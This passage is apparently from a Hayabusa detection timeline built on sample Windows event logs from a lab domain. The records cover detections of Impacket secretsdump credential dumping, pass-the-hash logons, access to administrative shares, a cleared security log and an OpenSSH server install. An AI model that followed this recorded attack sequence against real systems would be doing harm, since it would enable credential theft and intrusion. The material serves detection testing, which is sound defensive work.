+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:23.044 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:23.044 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: 
admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:23.060 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:23.171 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 09:00:09.959 +00:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:10.026 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:10.026 
+00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:11.118 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:11.118 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:13.226 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:13.226 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:13.226 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 
0xb32cb,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:13.226 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:13.258 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0xb32cb | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:14.421 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:14.437 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\BTeHLZkJ.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:14.437 
+00:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:14.735 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\NMdzZfem.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:14.735 +00:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:16.724 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\BTeHLZkJ.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:16.724 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\NMdzZfem.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential 
dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:16.724 +00:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:16.724 +00:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:19.875 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:19.891 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:19.891 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 
5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:19.891 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:20.003 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:22.544 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:22.544 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:22.560 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:22.575 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:22.591 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:22.591 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:22.591 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 
Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:22.606 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:22.606 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:22.622 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:22.696 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 
0x6c366,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 10:02:14.393 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.406 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.619 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Apply-WindowsUnattend"" ParameterBinding(Set-Alias): name=""Value""; value=""Use-WindowsUnattend""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.619 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Add-ProvisionedAppxPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Add-AppxProvisionedPackage""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral 
Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.620 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Remove-ProvisionedAppxPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Remove-AppxProvisionedPackage""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.620 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Get-ProvisionedAppxPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Get-AppxProvisionedPackage""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.620 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Optimize-ProvisionedAppxPackages"" ParameterBinding(Set-Alias): name=""Value""; value=""Optimize-AppxProvisionedPackages""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.621 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Set-ProvisionedAppXDataFile"" ParameterBinding(Set-Alias): name=""Value""; 
value=""Set-AppXProvisionedDataFile""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.621 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Add-AppProvisionedPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Add-AppxProvisionedPackage""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.621 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Remove-AppProvisionedPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Remove-AppxProvisionedPackage""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.622 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Get-AppProvisionedPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Get-AppxProvisionedPackage""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.622 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" 
ParameterBinding(Set-Alias): name=""Name""; value=""Optimize-AppProvisionedPackages"" ParameterBinding(Set-Alias): name=""Value""; value=""Optimize-AppxProvisionedPackages""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.623 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Set-AppPackageProvisionedDataFile"" ParameterBinding(Set-Alias): name=""Value""; value=""Set-AppXProvisionedDataFile""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.623 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Add-ProvisionedAppPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Add-AppxProvisionedPackage""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.623 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Remove-ProvisionedAppPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Remove-AppxProvisionedPackage""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 
+2021-04-22 10:02:14.624 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Get-ProvisionedAppPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Get-AppxProvisionedPackage""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.624 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Optimize-ProvisionedAppPackages"" ParameterBinding(Set-Alias): name=""Value""; value=""Optimize-AppxProvisionedPackages""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.624 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Set-ProvisionedAppPackageDataFile"" ParameterBinding(Set-Alias): name=""Value""; value=""Set-AppXProvisionedDataFile""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.627 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""*"" ParameterBinding(Export-ModuleMember): name=""Cmdlet""; 
